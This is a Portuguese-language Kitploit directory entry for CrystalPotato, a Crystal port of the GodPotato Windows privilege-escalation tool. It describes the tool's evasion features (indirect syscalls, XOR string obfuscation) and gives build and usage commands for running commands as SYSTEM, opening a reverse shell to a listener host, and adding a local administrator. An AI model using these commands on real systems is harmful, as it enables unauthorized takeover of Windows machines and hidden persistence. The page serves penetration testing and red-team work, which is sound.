Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CrystalPotato — Port em Crystal do GodPotato para abusar do SeImpersonatePrivilege com syscalls indiretas, resolução dinâmica de API e ofuscação de strings em tempo de compilação. Execute comandos, shells reversas ou adicione usuários. | Kitploit
Ferramentas/GitHubGitHub/ricardojoserf/crystalpotato
Escalada de PrivilégiosExploraçãoPós-ExploraçãoTestes de PenetraçãoRed TeamingAtaque Adversário
GitHubricardojoserf/crystalpotato

CrystalPotato

Port em Crystal do GodPotato para abusar do SeImpersonatePrivilege com syscalls indiretas, resolução dinâmica de API e ofuscação de strings em tempo de compilação. Execute comandos, shells reversas ou adicione usuários.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver RepositórioSite
1181835há 21 diasRevisado pelo Kitploit

CrystalPotato

Port em Crystal do GodPotato, uma escalada local de privilégios de contas com SeImpersonatePrivilege para SYSTEM. Funciona abusando do resolvedor OXID DCOM e da impersonação de named pipes.

As APIs do Windows são resolvidas dinamicamente e invocadas por meio de stubs de syscall indiretos, todas as strings são ofuscadas com XOR em tempo de compilação e, por padrão, apenas a saída do comando é impressa. Testado no Windows 10, 11 e Server 2025.

CrystalPotato

Build

CrystalPotato compila em um único arquivo sem dependências usando Crystal no Windows:

root@kitploit:~
crystal build CrystalPotato.cr -o CrystalPotato.exe --release --static

Usage

Execute um comando, inicie um reverse shell ou crie um administrador local.

root@kitploit:~
CrystalPotato.exe -c <COMMAND>
CrystalPotato.exe -H <LHOST> -P <LPORT> [-c <SHELL>]
CrystalPotato.exe -u <USER> -pw <PASS>

img2

Sources

  • GodPotato - Implementação original em C# por BeichenDream.

  • RustPotato - Implementação em Rust por safedv.

  • SigmaPotato - Implementação em C# com funcionalidades adicionais por tylerdotrar.

Baixar ferramenta
FlagDescription
-c CMDComando para executar como SYSTEM ou shell para reverse shell (padrão: cmd.exe)
-H HOSTHost do listener do reverse shell
-P PORTPorta do listener do reverse shell
-u USERCriar administrador local - Nome de usuário
-pw PASSCriar administrador local - Senha
-p NAMENome personalizado do pipe (padrão: Crystal)
-dSaída de depuração
-ddRastreamento completo
-hMostrar ajuda